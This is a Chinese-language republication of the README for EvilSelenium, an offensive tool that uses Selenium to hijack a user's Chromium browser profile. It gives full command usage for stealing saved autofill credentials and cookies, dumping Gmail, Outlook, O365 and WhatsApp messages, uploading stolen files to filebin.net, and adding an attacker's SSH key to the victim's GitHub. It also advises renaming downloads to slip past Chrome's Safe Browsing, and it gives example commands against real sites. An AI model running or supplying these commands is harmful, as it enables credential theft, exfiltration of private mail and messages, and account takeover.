> 文档中心 > 渗透工具EvilSelenium:将Selenium武器化以滥用基于Chromium的浏览器​

渗透工具EvilSelenium:将Selenium武器化以滥用基于Chromium的浏览器​

Git地址:

fmrd0x/EvilSelenium: EvilSelenium is a tool that weaponizes Selenium to attack Chromium based browsers. (github.com)

EvilSelenium


EvilSelenium是一个新项目,它将Selenium武器化以滥用基于Chromium的浏览器。目前的功能是:

  • 窃取存储的凭据(通过自动填充)
  • 偷饼干
  • 截取网站截图
  • 转储 Gmail/O365 电子邮件
  • 转储WhatsApp消息
  • 下载和泄露文件
  • 将 SSH 密钥添加到 GitHub

或者扩展现有功能以满足您的需求(例如,从用户的 GDrive/OneDrive 下载文件)。

注意


  1. 当此工具运行时,它将终止任何现有的浏览器进程,以便能够使用包含密码和活动会话的用户浏览器配置文件运行。

  2. 我在大约一周内构建了这个工具,我没有运行尽可能多的测试,因此可能会有一些错误。

  3. EvilSelenium模块并不总是稳定的。由于网站的不断变化,某些模块可能偶尔会中断。我将尽力维护现有模块,以确保它们按预期工作,但您已经收到警告。

用法


EvilSelenium.exe /?/help - Show this help menu.SETUP:/install - Install chromedriver & Selenium webdriver. Run this once.GLOBAL: (accepted with every command)/browserdir [appdata_local_routing] - Use custom browser, Input should be the routing inside %appdatalocal% dir (e.g. "Microsoft\Edge")RECON:/enumsavedsites [out_path] - Check which websites have passwords saved via screenshot(s)./screenshot [website] [out_path] - Screenshot a given webpage.CREDENTIALS:/autorun - Extract saved credentials from common websites./dynamicid [login_page] [username_id] [password_id] - Extract saved credentials from a website, providing the username field ID & password field ID./dynamicname [login_page] [username_name] [password_name] - Extract saved credentials from a website, providing the username field name value & password name value./dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - Extract saved credentials from a website, providing the username field name value, password name value and their positions.COOKIES:/cookies [website] - Grabs cookies for a given website.MODULES:/download [file_url] [seconds] - Downloads a file and specify time to wait for download to finish. File extensions should not be executable./exfil [local_file] [seconds] - Uploads a file on filebin.net and outputs the download link./gmail [out_path] [num_of_emails] - Fetches emails from mail.google.com if user is authenticated. Max 50 emails./outlook [out_path] [num_of_emails] - Fetches emails from Outlook if user is authenticated./o365 [out_path] [num_of_emails] - Fetches emails from O365 Outlook if user is authenticated./github [key] - Add your SSH key to Github if user is authenticated./whatsapp [out_path] - Fetches Whatsapp messages if user is authenticated (BETA).

设置


该命令将下载Chrome驱动程序和Selenium WebDriver,这是必要的要求。EvilSelenium将在Chrome版本100-90上运行。/install

在Windows 10,Chrome v97和v90上测试。

EvilSelenium.exe /install

全局配置


默认情况下,EvilSelenium将尝试使用Google Chrome的用户数据文件夹来检索数据,但也支持其他基于Chromium的浏览器。
为了使用不同的基于Chrome的浏览器,您应该在目录中添加以下浏览器路由。以下是一些常见浏览器的示例(应添加到任何 CLI 命令中):/browserdir%localappdata%

  1. 勇敢 - /browserdir BraveSoftware\Brave-Browser
  2. 微软边缘 - /browserdir Microsoft\Edge
  3. 维瓦尔第 - /browserdir Vivaldi

侦察模块


/enumsavedsites- 这将截取 chrome://settings/passwords 的屏幕截图

/screenshot- 截图任何网站。如果用户已通过网站身份验证,则:)获得经过身份验证的屏幕截图。

凭据模块


重要:凭据模块将删除 COOKIE,以便从自动填充中窃取凭据。理想情况下,如果要导出 Cookie,则应使用末尾的凭据模块。

/autorun- 为常见网站预构建的模板。我将继续添加更多内容。

/dynamicid- 提供登录 URL 以及用户名输入字段的 ID 和密码字段的 ID。这等效于 document.getElementById()。

/dynamicname- 如果字段没有 ID,请提供字段的名称值。它将选取名称值的第一个索引。这等效于 document.getElementsByName()[0].value。

/dynamicname2- 提供字段的名称值及其索引位置。这等效于 document.getElementsByName()[x].value,其中 x 是提供的位置。

 cookie模块


/cookies- 从指定网站转储 Cookie。

杂项模块


这些是我构建的附加模块,用于演示您可以使用Selenium执行哪些操作。

/download- 下载文件并指定等待下载的时间。在下载之前,应将不可执行的文件扩展名附加到文件中,以避免 Chrome 的安全浏览提示。

/exfil- 在 filebin.net 上传文件并指定等待上传完成的时间。上传完成后,将写入文件的下载链接。

/gmail- 如果用户已通过身份验证,则从 mail.google.com 中获取电子邮件。最多 50 封电子邮件。

/outlook- 如果用户经过身份验证,则从 Outlook 获取电子邮件。

/o365- 如果用户已通过身份验证,则从 O365 Outlook 获取电子邮件。

/github- 如果用户已通过身份验证,请将您的 SSH 密钥添加到 Github。

/whatsapp- 如果用户经过身份验证(BETA),则获取Whatsapp消息。

示例命令


EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloadsEvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_passwordEvilSelenium.exe /dynamicname https://linkedin.com session_key session_password

演示



🏹每日分享🏹:

不少人羡慕他人在生活中发现和遇到饶有趣味的事情,其实前者应该羡慕后者所具有的理解事物的禀赋才对。正是归因于他们理解事物的禀赋,他们经历过的事情,在其描绘中,都带有某种韵味。这是因为在一个思想丰富的人看来是意味深长的事情,对于一个肤浅、头脑庸俗的人来说,却不过是平凡世界里面的乏味一幕而已。

一《人生的智慧 第一章 基本的划分》